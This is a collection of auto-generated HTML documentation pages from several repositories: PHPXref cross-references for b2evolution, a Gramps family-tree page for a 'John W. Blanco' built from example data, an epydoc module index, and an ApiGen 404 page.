href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</a> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l456"> line 456</a></li> <li><a href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</a> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l457"> line 457</a></li> <li><a href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</a> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l461"> line 461</a></li> <li><a href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</a> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l462"> line 462</a></li> <li><a href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</a> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l640"> line 640</a></li> <li><a href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</a> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l645"> line 645</a></li> <li><a href="../inc/_ext/swift/classes/Swift/Signers/DKIMSigner.php.html">/inc/_ext/swift/classes/Swift/Signers/DKIMSigner.php</a> -> <a href="../inc/_ext/swift/classes/Swift/Signers/DKIMSigner.php.source.html#l651"> line 651</a></li> <li><a href="../inc/_ext/swift/classes/Swift/Signers/DKIMSigner.php.html">/inc/_ext/swift/classes/Swift/Signers/DKIMSigner.php</a> -> <a href="../inc/_ext/swift/classes/Swift/Signers/DKIMSigner.php.source.html#l664"> line 664</a></li> <li><a href="../inc/_ext/swift/classes/Swift/Signers/DKIMSigner.php.html">/inc/_ext/swift/classes/Swift/Signers/DKIMSigner.php</a> -> <a href="../inc/_ext/swift/classes/Swift/Signers/DKIMSigner.php.source.html#l665"> line 665</a></li> <li><a href="../inc/_ext/swift/classes/Swift/Signers/DomainKeySigner.php.html">/inc/_ext/swift/classes/Swift/Signers/DomainKeySigner.php</a> -> <a href="../inc/_ext/swift/classes/Swift/Signers/DomainKeySigner.php.source.html#l495"> line 495</a></li> <li><a href="../inc/_ext/swift/classes/Swift/Signers/DomainKeySigner.php.html">/inc/_ext/swift/classes/Swift/Signers/DomainKeySigner.php</a> -> <a href="../inc/_ext/swift/classes/Swift/Signers/DomainKeySigner.php.source.html#l500"> line 500</a></li> <li><a href="../inc/_ext/swift/classes/Swift/Signers/DomainKeySigner.php.html">/inc/_ext/swift/classes/Swift/Signers/DomainKeySigner.php</a> -> <a href="../inc/_ext/swift/classes/Swift/Signers/DomainKeySigner.php.source.html#l501"> line 501</a></li> </ul> <!-- A link to the phpxref site in your customized footer file is appreciated ;-) --> <br><hr> <table width="100%"> <tr><td>Generated: Sat Nov 21 22:13:19 2015</td> <td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td> </tr> </table> </body></html>
gramps42/gramps/example_NAVWEB0/ppl/k/b/RXAKQC74LYAT0CQBK.html
belissent/testing-example-reports
<!DOCTYPE html> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <head lang="en-US"> <title>My Family Tree - Blanco, John W.</title> <meta charset="UTF-8" /> <meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" /> <meta name ="apple-mobile-web-app-capable" content="yes" /> <meta name="generator" content="Gramps 4.2.2 http://gramps-project.org/" /> <meta name="author" content="" /> <link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" /> <link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" /> <link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" /> <link href="../../../css/ancestortree.css" media="screen" rel="stylesheet" type="text/css" /> </head> <body> <div id="header"> <h1 id="SiteTitle">My Family Tree</h1> </div> <div class="wrapper" id="nav" role="navigation"> <div class="container"> <ul class="menu" id="dropmenu"> <li class = "CurrentSection"><a href="../../../individuals.html" title="Individuals">Individuals</a></li> <li><a href="../../../index.html" title="Surnames">Surnames</a></li> <li><a href="../../../places.html" title="Places">Places</a></li> <li><a href="../../../sources.html" title="Sources">Sources</a></li> <li><a href="../../../media.html" title="Media">Media</a></li> <li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li> </ul> </div> </div> <div class="content" id="IndividualDetail"> <h3>Blanco, John W.<sup><small> <a href="#sref1">1</a></small></sup></h3> <div id="summaryarea"> <table class="infolist"> <tr> <td class="ColumnAttribute">Birth Name</td> <td class="ColumnValue"> Blanco, John W. </td> </tr> <tr> <td class="ColumnAttribute">Gramps&nbsp;ID</td> <td class="ColumnValue">I0874</td> </tr> <tr> <td class="ColumnAttribute">Gender</td> <td class="ColumnValue">male</td> </tr> </table> </div> <div class="subsection" id="events"> <h4>Events</h4> <table class="infolist eventlist"> <thead> <tr> <th class="ColumnEvent">Event</th> <th class="ColumnDate">Date</th> <th class="ColumnPlace">Place</th> <th class="ColumnDescription">Description</th> <th class="ColumnNotes">Notes</th> <th class="ColumnSources">Sources</th> </tr> </thead> <tbody> <tr> <td class="ColumnEvent"> Birth </td> <td class="ColumnDate">1838</td> <td class="ColumnPlace"> <a href="../../../plc/q/w/TWAKQCC5HH0G6YUZWQ.html" title="Scottsbluff, NE, USA"> Scottsbluff, NE, USA </a> </td> <td class="ColumnDescription"> Birth of Blanco, John W. </td> <td class="ColumnNotes"> <div> </div> </td> <td class="ColumnSources"> &nbsp; </td> </tr> </tbody> </table> </div> <div class="subsection" id="parents"> <h4>Parents</h4> <table class="infolist"> <thead> <tr> <th class="ColumnAttribute">Relation to main person</th> <th class="ColumnValue">Name</th> <th class="ColumnValue">Relation within this family (if not by birth)</th> </tr> </thead> <tbody> </tbody> <tr> <td class="ColumnAttribute">Father</td> <td class="ColumnValue"> <a href="../../../ppl/l/s/LW4KQCI6NR543UDCSL.html">Blanco, Rufus<span class="grampsid"> [I0599]</span></a> </td> </tr> <tr> <td class="ColumnAttribute">Mother</td> <td class="ColumnValue"> <a href="../../../ppl/n/h/LV4KQCMDZ6MWABTXHN.html">Rodriquez, Mariam<span class="grampsid"> [I0598]</span></a> </td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;Sister</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/4/0/9AVJQCMZWQ2LPWZR04.html">Blanco, Lucinda Catherine<span class="grampsid"> [I0069]</span></a></td> <td class="ColumnValue"></td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;Sister</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/i/k/JWAKQCFOIQMJU4SJKI.html">Blanco, Malvina<span class="grampsid"> [I0873]</span></a></td> <td class="ColumnValue"></td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/k/b/RXAKQC74LYAT0CQBK.html">Blanco, John W.<span class="grampsid"> [I0874]</span></a></td> <td class="ColumnValue"></td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;Sister</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/f/a/LYAKQCT2QKFQUVU4AF.html">Blanco, Mary F.<span class="grampsid"> [I0875]</span></a></td> <td class="ColumnValue"></td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;Brother</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/h/b/4ZAKQCNOQZOTURX2BH.html">Blanco, Paris<span class="grampsid"> [I0876]</span></a></td> <td class="ColumnValue"></td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;Brother</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/i/p/51BKQCNSRBBAJL1XPI.html">Blanco, Stephen<span class="grampsid"> [I0878]</span></a></td> <td class="ColumnValue"></td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;Brother</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/n/c/B2BKQCFJFL0RHZ8NCN.html">Blanco, Milton<span class="grampsid"> [I0879]</span></a></td> <td class="ColumnValue"></td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;Sister</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/x/d/B3BKQCSV0G3NKSKWDX.html">Blanco, L. J.<span class="grampsid"> [I0880]</span></a></td> <td class="ColumnValue"></td> </tr> </table> </div> <div class="subsection" id="pedigree"> <h4>Pedigree</h4> <ol class="pedigreegen"> <li> <a href="../../../ppl/l/s/LW4KQCI6NR543UDCSL.html">Blanco, Rufus<span class="grampsid"> [I0599]</span></a> <ol> <li class="spouse"> <a href="../../../ppl/n/h/LV4KQCMDZ6MWABTXHN.html">Rodriquez, Mariam<span class="grampsid"> [I0598]</span></a> <ol> <li> <a href="../../../ppl/4/0/9AVJQCMZWQ2LPWZR04.html">Blanco, Lucinda Catherine<span class="grampsid"> [I0069]</span></a> </li> <li> <a href="../../../ppl/i/k/JWAKQCFOIQMJU4SJKI.html">Blanco, Malvina<span class="grampsid"> [I0873]</span></a> </li> <li class="thisperson"> Blanco, John W. </li> <li> <a href="../../../ppl/f/a/LYAKQCT2QKFQUVU4AF.html">Blanco, Mary F.<span class="grampsid"> [I0875]</span></a> </li> <li> <a href="../../../ppl/h/b/4ZAKQCNOQZOTURX2BH.html">Blanco, Paris<span class="grampsid"> [I0876]</span></a> </li> <li> <a href="../../../ppl/i/p/51BKQCNSRBBAJL1XPI.html">Blanco, Stephen<span class="grampsid"> [I0878]</span></a> </li> <li> <a href="../../../ppl/n/c/B2BKQCFJFL0RHZ8NCN.html">Blanco, Milton<span class="grampsid"> [I0879]</span></a> </li> <li> <a href="../../../ppl/x/d/B3BKQCSV0G3NKSKWDX.html">Blanco, L. J.<span class="grampsid"> [I0880]</span></a> </li> </ol> </li> </ol> </li> </ol> </div> <div class="subsection" id="tree"> <h4>Ancestors</h4> <div id="treeContainer" style="width:735px; height:602px;"> <div class="boxbg male AncCol0" style="top: 269px; left: 6px;"> <a class="noThumb" href="../../../ppl/k/b/RXAKQC74LYAT0CQBK.html"> Blanco, John W. </a> </div> <div class="shadow" style="top: 274px; left: 10px;"></div> <div class="bvline" style="top: 301px; left: 165px; width: 15px"></div> <div class="gvline" style="top: 306px; left: 165px; width: 20px"></div> <div class="boxbg male AncCol1" style="top: 119px; left: 196px;"> <a class="noThumb" href="../../../ppl/l/s/LW4KQCI6NR543UDCSL.html"> Blanco, Rufus </a> </div> <div class="shadow" style="top: 124px; left: 200px;"></div> <div class="bvline" style="top: 151px; left: 180px; width: 15px;"></div> <div class="gvline" style="top: 156px; left: 185px; width: 20px;"></div> <div class="bhline" style="top: 151px; left: 180px; height: 150px;"></div> <div class="gvline" style="top: 156px; left: 185px; height: 150px;"></div> <div class="bvline" style="top: 151px; left: 355px; width: 15px"></div> <div class="gvline" style="top: 156px; left: 355px; width: 20px"></div> <div class="boxbg male AncCol2" style="top: 44px; left: 386px;"> <a class="noThumb" href="../../../ppl/y/z/UTBKQCKL70WCIEGTZY.html"> Blanco, John Sr. </a> </div> <div class="shadow" style="top: 49px; left: 390px;"></div> <div class="bvline" style="top: 76px; left: 370px; width: 15px;"></div> <div class="gvline" style="top: 81px; left: 375px; width: 20px;"></div> <div class="bhline" style="top: 76px; left: 370px; height: 75px;"></div> <div class="gvline" style="top: 81px; left: 375px; height: 75px;"></div> <div class="bvline" style="top: 76px; left: 545px; width: 15px"></div> <div class="gvline" style="top: 81px; left: 545px; width: 20px"></div> <div class="boxbg male AncCol3" style="top: 7px; left: 576px;"> <a class="noThumb" href="../../../ppl/e/1/USBKQCPZF1FOMPF31E.html"> Blanco, Peter </a> </div> <div class="shadow" style="top: 12px; left: 580px;"></div> <div class="bvline" style="top: 39px; left: 560px; width: 15px;"></div> <div class="gvline" style="top: 44px; left: 565px; width: 20px;"></div> <div class="bhline" style="top: 39px; left: 560px; height: 37px;"></div> <div class="gvline" style="top: 44px; left: 565px; height: 37px;"></div> <div class="boxbg female AncCol3" style="top: 81px; left: 576px;"> <a class="noThumb" href="../../../ppl/g/u/FTBKQCS2G32PLYLUG.html"> Glover, Elizabeth </a> </div> <div class="shadow" style="top: 86px; left: 580px;"></div> <div class="bvline" style="top: 113px; left: 560px; width: 15px;"></div> <div class="gvline" style="top: 118px; left: 565px; width: 20px;"></div> <div class="bhline" style="top: 76px; left: 560px; height: 37px;"></div> <div class="gvline" style="top: 81px; left: 565px; height: 37px;"></div> <div class="boxbg female AncCol2" style="top: 194px; left: 386px;"> <a class="noThumb" href="../../../ppl/6/r/YUBKQCNO26O89B3OR6.html"> Lucas, Christina </a> </div> <div class="shadow" style="top: 199px; left: 390px;"></div> <div class="bvline" style="top: 226px; left: 370px; width: 15px;"></div> <div class="gvline" style="top: 231px; left: 375px; width: 20px;"></div> <div class="bhline" style="top: 151px; left: 370px; height: 75px;"></div> <div class="gvline" style="top: 156px; left: 375px; height: 75px;"></div> <div class="boxbg female AncCol1" style="top: 419px; left: 196px;"> <a class="noThumb" href="../../../ppl/n/h/LV4KQCMDZ6MWABTXHN.html"> Rodriquez, Mariam </a> </div> <div class="shadow" style="top: 424px; left: 200px;"></div> <div class="bvline" style="top: 451px; left: 180px; width: 15px;"></div> <div class="gvline" style="top: 456px; left: 185px; width: 20px;"></div> <div class="bhline" style="top: 301px; left: 180px; height: 150px;"></div> <div class="gvline" style="top: 306px; left: 185px; height: 150px;"></div> <div class="bvline" style="top: 451px; left: 355px; width: 15px"></div> <div class="gvline" style="top: 456px; left: 355px; width: 20px"></div> <div class="boxbg male AncCol2" style="top: 344px; left: 386px;"> <a class="noThumb" href="../../../ppl/p/j/JU4KQCPY774JTXJFJP.html"> Rodriquez, William M. </a> </div> <div class="shadow" style="top: 349px; left: 390px;"></div> <div class="bvline" style="top: 376px; left: 370px; width: 15px;"></div> <div class="gvline" style="top: 381px; left: 375px; width: 20px;"></div> <div class="bhline" style="top: 376px; left: 370px; height: 75px;"></div> <div class="gvline" style="top: 381px; left: 375px; height: 75px;"></div> <div class="bvline" style="top: 376px; left: 545px; width: 15px"></div> <div class="gvline" style="top: 381px; left: 545px; width: 20px"></div> <div class="boxbg male AncCol3" style="top: 307px; left: 576px;"> <a class="noThumb" href="../../../ppl/2/m/I6QKQCFRDTV2LDC8M2.html"> Rodriquez </a> </div> <div class="shadow" style="top: 312px; left: 580px;"></div> <div class="bvline" style="top: 339px; left: 560px; width: 15px;"></div> <div class="gvline" style="top: 344px; left: 565px; width: 20px;"></div> <div class="bhline" style="top: 339px; left: 560px; height: 37px;"></div> <div class="gvline" style="top: 344px; left: 565px; height: 37px;"></div> <div class="boxbg female AncCol2" style="top: 494px; left: 386px;"> <a class="noThumb" href="../../../ppl/n/z/WVBKQC4M0WSS7YOMZN.html"> Douglas, Mary"Polly" </a> </div> <div class="shadow" style="top: 499px; left: 390px;"></div> <div class="bvline" style="top: 526px; left: 370px; width: 15px;"></div> <div class="gvline" style="top: 531px; left: 375px; width: 20px;"></div> <div class="bhline" style="top: 451px; left: 370px; height: 75px;"></div> <div class="gvline" style="top: 456px; left: 375px; height: 75px;"></div> <div class="bvline" style="top: 526px; left: 545px; width: 15px"></div> <div class="gvline" style="top: 531px; left: 545px; width: 20px"></div> <div class="boxbg male AncCol3" style="top: 457px; left: 576px;"> <a class="noThumb" href="../../../ppl/8/4/XODKQCEZISUYEE5J48.html"> Douglas, Frederick </a> </div> <div class="shadow" style="top: 462px; left: 580px;"></div> <div class="bvline" style="top: 489px; left: 560px; width: 15px;"></div> <div class="gvline" style="top: 494px; left: 565px; width: 20px;"></div> <div class="bhline" style="top: 489px; left: 560px; height: 37px;"></div> <div class="gvline" style="top: 494px; left: 565px; height: 37px;"></div> <div class="boxbg female AncCol3" style="top: 531px; left: 576px;"> <a class="noThumb" href="../../../ppl/i/3/OPDKQC8T84H79IVZ3I.html"> Stanley, Barbara </a> </div> <div class="shadow" style="top: 536px; left: 580px;"></div> <div class="bvline" style="top: 563px; left: 560px; width: 15px;"></div> <div class="gvline" style="top: 568px; left: 565px; width: 20px;"></div> <div class="bhline" style="top: 526px; left: 560px; height: 37px;"></div> <div class="gvline" style="top: 531px; left: 565px; height: 37px;"></div> </div> </div> <div class="subsection" id="sourcerefs"> <h4>Source References</h4> <ol> <li> <a href="../../../src/x/a/X5TJQC9JXU4RKT6VAX.html" title="Import from test2.ged" name ="sref1"> Import from test2.ged <span class="grampsid"> [S0003]</span> </a> </li> </ol> </div> </div> <div class="fullclear"></div> <div id="footer"> <p id="createdate"> Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.2 on 2015-12-25<br />Last change was the 2007-07-26 08:34:25 </p> <p id="copyright"> </p> </div> </body> </html>
doc/html/toc-script-MLVA_normalizer-module.html
afelten-Anses/MLVA_normalizer
<?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>script-MLVA_normalizer</title> <link rel="stylesheet" href="epydoc.css" type="text/css" /> <script type="text/javascript" src="epydoc.js"></script> </head> <body bgcolor="white" text="black" link="blue" vlink="#204080" alink="#204080"> <h1 class="toc">Module script-MLVA_normalizer</h1> <hr /> <h2 class="toc">Functions</h2> <a target="mainFrame" href="script-MLVA_normalizer-module.html#compensation" >compensation</a><br /> <a target="mainFrame" href="script-MLVA_normalizer-module.html#get_parser" >get_parser</a><br /> <a target="mainFrame" href="script-MLVA_normalizer-module.html#imin_imax" >imin_imax</a><br /> <a target="mainFrame" href="script-MLVA_normalizer-module.html#main" >main</a><br /> <a target="mainFrame" href="script-MLVA_normalizer-module.html#normalization_table_for_one_pattern" >normalization_table_for_one_pattern</a><br /> <a target="mainFrame" href="script-MLVA_normalizer-module.html#normalization_table_for_two_pattern" >normalization_table_for_two_pattern</a><br /> <a target="mainFrame" href="script-MLVA_normalizer-module.html#open_file" >open_file</a><br /> <a target="mainFrame" href="script-MLVA_normalizer-module.html#profile_MLVA" >profile_MLVA</a><br /> <a target="mainFrame" href="script-MLVA_normalizer-module.html#table_de_correction" >table_de_correction</a><br /> <a target="mainFrame" href="script-MLVA_normalizer-module.html#writing_file" >writing_file</a><br /> <h2 class="toc">Variables</h2> <a target="mainFrame" href="script-MLVA_normalizer-module.html#__doc__" >__doc__</a><br /> <a target="mainFrame" href="script-MLVA_normalizer-module.html#__package__" >__package__</a><br /><hr /> <span class="options">[<a href="javascript:void(0);" class="privatelink" onclick="toggle_private();">hide&nbsp;private</a>]</span> <script type="text/javascript"> <!-- // Private objects are initially displayed (because if // javascript is turned off then we want them to be // visible); but by default, we want to hide them. So hide // them unless we have a cookie that says to show them. checkCookie(); // --> </script> </body> </html>
doc-cultura/404.html
Kellin-Andrea/culturaCalena
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="robots" content="noindex"> <title>Page not found</title> <link rel="stylesheet" href="resources/style.css?e99947befd7bf673c6b43ff75e9e0f170c88a60e"> </head> <body> <div id="left"> <div id="menu"> <a href="index.html" title="Overview"><span>Overview</span></a> <div id="groups"> </div> <div id="elements"> <h3>Classes</h3> <ul> <li><a href="class-bitacoraBaseTableClass.html">bitacoraBaseTableClass</a></li> <li><a href="class-bitacoraTableClass.html">bitacoraTableClass</a></li> <li><a href="class-categoriaBaseTableClass.html">categoriaBaseTableClass</a></li> <li><a href="class-categoriaTableClass.html">categoriaTableClass</a></li> <li><a href="class-createActionClass.html" class="invalid">createActionClass</a></li> <li><a href="class-credencialBaseTableClass.html">credencialBaseTableClass</a></li> <li><a href="class-credencialTableClass.html">credencialTableClass</a></li> <li><a href="class-datoUsuarioBaseTableClass.html">datoUsuarioBaseTableClass</a></li> <li><a href="class-datoUsuarioTableClass.html">datoUsuarioTableClass</a></li> <li><a href="class-deleteActionClass.html" class="invalid">deleteActionClass</a></li> <li><a href="class-deleteFiltersActionClass.html">deleteFiltersActionClass</a></li> <li><a href="class-deleteSelectActionClass.html" class="invalid">deleteSelectActionClass</a></li> <li><a href="class-detallePqrsBaseTableClass.html">detallePqrsBaseTableClass</a></li> <li><a href="class-detallePqrsTableClass.html">detallePqrsTableClass</a></li> <li><a href="class-editActionClass.html" class="invalid">editActionClass</a></li> <li><a href="class-estadoPqrsBaseTableClass.html">estadoPqrsBaseTableClass</a></li> <li><a href="class-estadoPqrsTableClass.html">estadoPqrsTableClass</a></li> <li><a href="class-eventoBaseTableClass.html">eventoBaseTableClass</a></li> <li><a href="class-eventoPatrocinadorBaseTableClass.html">eventoPatrocinadorBaseTableClass</a></li> <li><a href="class-eventoPatrocinadorTableClass.html">eventoPatrocinadorTableClass</a></li> <li><a href="class-eventoTableClass.html">eventoTableClass</a></li> <li><a href="class-exceptionActionClass.html">exceptionActionClass</a></li> <li><a href="class-graficaActionClass.html">graficaActionClass</a></li> <li><a href="class-indexActionClass.html" class="invalid">indexActionClass</a></li> <li><a href="class-insertActionClass.html" class="invalid">insertActionClass</a></li> <li><a href="class-localidadBaseTableClass.html">localidadBaseTableClass</a></li> <li><a href="class-localidadTableClass.html">localidadTableClass</a></li> <li><a href="class-loginActionClass.html">loginActionClass</a></li> <li><a href="class-logoutActionClass.html">logoutActionClass</a></li> <li><a href="class-noPermissionActionClass.html">noPermissionActionClass</a></li> <li><a href="class-organizacionBaseTableClass.html">organizacionBaseTableClass</a></li> <li><a href="class-organizacionTableClass.html">organizacionTableClass</a></li> <li><a href="class-patrocinadorBaseTableClass.html">patrocinadorBaseTableClass</a></li> <li><a href="class-patrocinadorTableClass.html">patrocinadorTableClass</a></li> <li><a href="class-pqrsBaseTableClass.html">pqrsBaseTableClass</a></li> <li><a href="class-pqrsTableClass.html">pqrsTableClass</a></li> <li><a href="class-recaudoEconomicoBaseTableClass.html">recaudoEconomicoBaseTableClass</a></li> <li><a href="class-recaudoEconomicoTableClass.html">recaudoEconomicoTableClass</a></li> <li><a href="class-recordarMeBaseTableClass.html">recordarMeBaseTableClass</a></li> <li><a href="class-recordarMeTableClass.html">recordarMeTableClass</a></li> <li><a href="class-reportActionClass.html" class="invalid">reportActionClass</a></li> <li><a href="class-tarifaBaseTableClass.html">tarifaBaseTableClass</a></li> <li><a href="class-tarifaTableClass.html">tarifaTableClass</a></li> <li><a href="class-tipoDocumentoBaseTableClass.html">tipoDocumentoBaseTableClass</a></li> <li><a href="class-tipoDocumentoTableClass.html">tipoDocumentoTableClass</a></li> <li><a href="class-tipoPqrsBaseTableClass.html">tipoPqrsBaseTableClass</a></li> <li><a href="class-tipoPqrsTableClass.html">tipoPqrsTableClass</a></li> <li><a href="class-traductorActionClass.html" class="invalid">traductorActionClass</a></li> <li><a href="class-updateActionClass.html" class="invalid">updateActionClass</a></li> <li><a href="class-usuarioBaseTableClass.html">usuarioBaseTableClass</a></li> <li><a href="class-usuarioCredencialBaseTableClass.html">usuarioCredencialBaseTableClass</a></li> <li><a href="class-usuarioCredencialTableClass.html">usuarioCredencialTableClass</a></li> <li><a href="class-usuarioGustaCategoriaBaseTableClass.html">usuarioGustaCategoriaBaseTableClass</a></li> <li><a href="class-usuarioGustaCategoriaTableClass.html">usuarioGustaCategoriaTableClass</a></li> <li><a href="class-usuarioTableClass.html">usuarioTableClass</a></li> </ul> </div> </div> </div> <div id="splitter"></div> <div id="right"> <div id="rightInner"> <form id="search"> <input type="hidden" name="cx" value=""> <input type="hidden" name="ie" value="UTF-8"> <input type="text" name="q" class="text" placeholder="Search"> </form> <div id="navigation"> <ul> <li> <a href="index.html" title="Overview"><span>Overview</span></a> </li> <li> <span>Class</span> </li> </ul> <ul> </ul> <ul> </ul> </div> <div id="content"> <h1>Page not found</h1> <p>The requested page could not be found.</p> <p>You have probably clicked on a link that is outdated and points to a page that does not exist any more or you have made an typing error in the address.</p> <p>To continue please try to find requested page in the menu, or use search field on the top.</p> </div> <div id="footer"> API documentation generated by <a href="http://apigen.org">ApiGen</a> </div> </div> </div> <script src="resources/combined.js?cd021bc814832c24a7cec5319ea03335bfba1caf"></script> <script src="elementlist.js"></script> </body> </html>
_variables/file_list.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $file_list</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-print.css" type="text/css" media="print"> <style id="hilight" type="text/css"></style> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> </head> <body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff"> <table class="pagetitle" width="100%"> <tr> <td valign="top" class="pagetitle"> [ <a href="../index.html">Index</a> ] </td> <td align="right" class="pagetitle"> <h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2> </td> </tr> </table> <!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 --> <!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net --> <!-- http://phpxref.sourceforge.net/ --> <script src="../phpxref.js" type="text/javascript"></script> <script language="JavaScript" type="text/javascript"> <!-- ext='.html'; relbase='../'; subdir='_variables'; filename='index.html'; cookiekey='phpxref'; handleNavFrame(relbase, subdir, filename); logVariable('file_list'); // --> </script> <script language="JavaScript" type="text/javascript"> if (gwGetCookie('xrefnav')=='off') document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>'); else document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>'); </script> <noscript> <p class="navlinks"> [ <a href="../nav.html" target="_top">Show Explorer</a> ] [ <a href="index.html" target="_top">Hide Navbar</a> ] </p> </noscript> [<a href="../index.html">Top level directory</a>]<br> <script language="JavaScript" type="text/javascript"> <!-- document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>'); document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">'); document.writeln('<tr><td class="searchbox-title">'); document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>'); document.writeln('<\/td><\/tr>'); document.writeln('<tr><td class="searchbox-body" id="searchbox-body">'); document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>'); document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: '); document.writeln('<input type="text" size=10 value="" name="classname"><br>'); document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: '); document.writeln('<input type="text" size=10 value="" name="funcname"><br>'); document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: '); document.writeln('<input type="text" size=10 value="" name="varname"><br>'); document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: '); document.writeln('<input type="text" size=10 value="" name="constname"><br>'); document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: '); document.writeln('<input type="text" size=10 value="" name="tablename"><br>'); document.writeln('<input type="submit" class="searchbox-button" value="Search">'); document.writeln('<\/form>'); document.writeln('<\/td><\/tr><\/table>'); document.writeln('<\/td><\/tr><\/table>'); // --> </script> <div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div> <h3>Variable Cross Reference</h3> <h2><a href="index.html#file_list">$file_list</a></h2> <b>Defined at:</b><ul> <li><a href="../inc/maintenance/model/_maintenance.funcs.php.html">/inc/maintenance/model/_maintenance.funcs.php</A> -> <a href="../inc/maintenance/model/_maintenance.funcs.php.source.html#l341"> line 341</A></li> <li><a href="../inc/maintenance/model/_backup.class.php.html">/inc/maintenance/model/_backup.class.php</A> -> <a href="../inc/maintenance/model/_backup.class.php.source.html#l320"> line 320</A></li> <li><a href="../inc/maintenance/model/_backup.class.php.html">/inc/maintenance/model/_backup.class.php</A> -> <a href="../inc/maintenance/model/_backup.class.php.source.html#l527"> line 527</A></li> </ul> <br><b>Referenced 7 times:</b><ul> <li><a href="../inc/maintenance/model/_maintenance.funcs.php.html">/inc/maintenance/model/_maintenance.funcs.php</a> -> <a href="../inc/maintenance/model/_maintenance.funcs.php.source.html#l341"> line 341</a></li> <li><a href="../inc/maintenance/model/_maintenance.funcs.php.html">/inc/maintenance/model/_maintenance.funcs.php</a> -> <a href="../inc/maintenance/model/_maintenance.funcs.php.source.html#l360"> line 360</a></li> <li><a href="../inc/maintenance/model/_maintenance.funcs.php.html">/inc/maintenance/model/_maintenance.funcs.php</a> -> <a href="../inc/maintenance/model/_maintenance.funcs.php.source.html#l462"> line 462</a></li> <li><a href="../inc/maintenance/model/_backup.class.php.html">/inc/maintenance/model/_backup.class.php</a> -> <a href="../inc/maintenance/model/_backup.class.php.source.html#l320"> line 320</a></li> <li><a 